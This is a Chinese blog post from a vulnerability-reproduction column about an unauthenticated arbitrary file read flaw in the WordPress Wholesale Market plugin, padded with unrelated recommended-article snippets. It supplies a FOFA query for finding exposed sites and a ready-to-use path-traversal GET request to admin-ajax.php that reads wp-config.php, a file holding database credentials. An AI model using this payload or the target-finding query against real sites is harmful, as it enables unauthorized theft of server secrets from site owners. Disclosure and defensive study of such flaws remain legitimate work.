【漏洞复现】WordPress_Wholesale_Market admin-ajax.php 任意文件读取漏洞

最新推荐文章于 2024-05-06 19:26:23 发布
最新推荐文章于 2024-05-06 19:26:23 发布
阅读量148 收藏 1
点赞数
分类专栏: 漏洞复现 文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_67810151/article/details/138027985
版权

0x01 产品简介

WordPress Wholesale Market是一个WordPress主题,专门设计用于创建批发市场和在线商城网站。该主题提供了许多功能和设计元素,使您能够轻松地构建一个功能强大的批发市场平台,以满足批发商和零售商的需求。

0x02 漏洞概述

WordPress Wholesale Market存在任意文件读取漏洞,未授权的攻击者可以通过该漏洞读取服务器文件,造成敏感信息泄露。

0x03 测绘语句

fofa: body="wp-content/plugins/wholesale-market"

0x04 漏洞复现

GET /wp-admin/admin-ajax.php?action=ced_cwsm_csv_import_export_module_download_error_log&tab=ced_cwsm_plugin§ion=ced_cwsm_csv_import_export_module&ced_cwsm_log_download=../../../wp-config.php HTTP/1.1

0x05 影响范围

了解本专栏 订阅专栏 解锁全文 超级会员免费看
从不学安全
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
php-wp-adfly.zip_API_WordPress_link_link-shortener
09-20
wordpress php link shortener api wrapper
admin.php wordpress,Wordpress admin-ajax.php远程SQL注入漏洞
weixin_28718769的博客
03-11 1183
WordPress是一款免费的论坛Blog系统。WordPress实上存在输入验证漏洞,远程攻击者可能利用此漏洞执行SQL注入攻击非授权访问数据库。WordPress的wp-admin/admin-ajax.php文件没有正确验证对cookie参数的输入。在wp-admin/admin-ajax.php的6行:------------------[source code]------------...
WordPress后台出 admin-ajax.php 500错误
zhangzeshan
10-15 4185
因为对WP不是很熟悉,误打误撞解决了这个问题: 原先是以为这个admin-ajax.php文件了逻辑错误,但是死活找不到哪边出错 换了思路,先是打开调试模式,出了错误: 从错误入手,发wp-config.php中设置了两个内存限制的语句   尝试先把这两句注释掉. 接下来找到/wp-includes/default-constants.php 找到代码段  这是默认的...
wordpress 的ajax 接口:admin-ajax.php 的利用
热门推荐
雁过留痕
03-16 1万+
【引子】 我想实wordpress的无刷新登录,想到可以用ajax读取用户的提交的表单,然后post给wp-login.php处理,结果被wp-login.php拒绝了,报了权限错误,一开始一直在想解决权限的问题,但是总是会去修改wp-login.php(这样会破坏文件原来的结构,不是我想要的)。后面找到了admin-ajax.php。 【正文】 在wordpress上实ajax,可以通
0day-未公开漏洞-wordpress wholesale market 文件读取漏洞
weixin_43167326的博客
03-19 613
WordPress plugin Wholesale Market 是一个woocommerce扩展插件,使您的商店能够创建批发用户,并通过设置产品的批发价格。wordpress wholesale market 存在文件读取漏洞
wordpress插件_seo-by-rank-math.1.0.36.2.zip
12-22
wordpress插件_seo-by-rank-math.1.0.36.2.zip wordpress资源合集:https://blog.csdn.net/liujinbao8000/article/details/103649882
WordPress配置文件wp-config.php详解
09-29
主要介绍了WordPress配置文件wp-config.php详解,包含很多控制Wordpress的技巧,需要的朋友可以参考下
wordpress-seo.zip_PHP wordpress_SEO_分词
09-20
WordPress SEO 中文插件 就是利用中文分词给日志建议关键字,并利用关键字对你博客进行 SEO。 1.修正了无法访问分词服务器错误信息 2.修正了没有目录出的错误信息 3.修正了在编写文章时由于自动存储文章而无法在...
php利用阿里云短信SDK实短信发送功能
赛时科技
05-02 963
在阿里云控制台的AccessKey管理中,创建或查看AccessKey ID和AccessKey Secret,这是用于API调用的身份凭证。用户在前端接收到短信验证码后,需要在你的系统中进行验证。在实际部署之前,确保在测试环境中充分测试你的短信验证码登录功能。首先,你需要有一个阿里云账号,并在阿里云控制台中开通短信服务(Dysmsapi)。你可以使用Composer来安装阿里云短信服务的PHP SDK。在PHP中,你需要编写一个函数来调用阿里云短信服务API发送短信验证码。
PHP 在字符中找出重次数最多的字符
zzjnlwb的专栏
05-06 146
应该也还有其他很多办法!等我遇到了再更新本篇!我感觉这是最简单的一种办法!
Debian 德比安 Nginx + PHP + MySql + beanstalkd + Redis + Node.js
HzqGhost's Blog
04-29 680
网卡模式选择桥接 mirrors.163.com阿里镜像源DeBian 安装软件选择时勾选上apt updateapt install sudo #安装 sudousermod -aG sudo username #添加普通账号到 sudo让 root 可以 SSH配置文件 /etc/ssh/sshd_config找到 PermitRootLogin 选项 并将其值修改为重启ssh先在 VirtualBox 上添加好。
框架漏洞RCE-1
x88125E的博客
05-01 1025
前置知识,thinkphp5.0.23漏洞
如何根据IP获取国家省份城市名称PHP免费版
大力水手z博客
05-06 248
如何根据IP获取国家省份城市名称PHP免费版
【Web】CTFSHOW 新手杯 题解
uuzeray的博客
05-02 372
先本地起个服务,先直接请求,再请求?name=Z3r4y,拿到new_rookie_info和Z3r4y_info。对比一下,其实就是要让I3为I1就可,sb后的.起到截断作用,id在name之后,name是我们可控的。$secret为$_COOKIE[secret],直接引用绕过了。可以在/change路由进行打入,用newname替换name。打PHP_SESSION_UPLOAD_PROGRESS。运行结果插到cookie里,而后便可为所欲为。当id为0时可以拿到flag。令mode为0看到源码。
PHP算命源码_最新测算塔罗源码_可以运营
吉他程序员的博客
04-30 383
八字精批、事业财运、姓名分析、宝宝起名、公司测名、姓名配对、综合详批、姻缘测算、牛年感情、PC版测算、八字合婚、紫微斗数、鼠年运程、月老姻缘、许愿祈福、号码解析、塔罗运势、脱单占卜、感情继续、脱单占卜、塔罗爱情、心理有你、能否合、暗恋对象、是否分手、爱着别人、大师服务(包含多项功能)共计30余项功能,全网功能全,完善的版本。
wordpress外贸建站公司歪建站新版网站上线
最新发布
xiaoyuya
05-06 107
wordpress外贸建站公司
检测服务器环境,实快速部署。适用于CRMEB_PRO/多店
weixin_64051447的博客
05-06 205
如果您不会使用python 不会配置python环境,可以使用我已经打包好的程序。最近被好多人问,本来运行的好好的,突然swoole就启动不了了。本工具为爱发电,如果工具正好解决了您的需求。将程序放在服务器下,直接“./文件名” 运行即可。
admin-ajax.php加载速度慢,原来这才是影响WordPress网站加载速度慢的罪魁祸首!
06-02
是的,admin-ajax.php是WordPress的一个核心文件,它用于与后端服务器进行通信和数据交换,例如加载评论、更新插件等。由于它的频繁调用和大量数据交换,可能会导致网站加载速度缓慢。为了解决这个问题,你可以采取以下措施: 1. 使用缓存插件来优化网站性能,如WP Super Cache或W3 Total Cache等。 2. 使用CDN(内容分发网络)来加速网站加载速度,如Cloudflare或MaxCDN等。 3. 优化数据库查询,删除不必要的插件和主题等。 4. 禁用不必要的WordPress AJAX调用,如删除不必要的插件或使用代码禁用。 以上措施可以有效地优化网站性能和加速加载速度。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

从不学安全

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值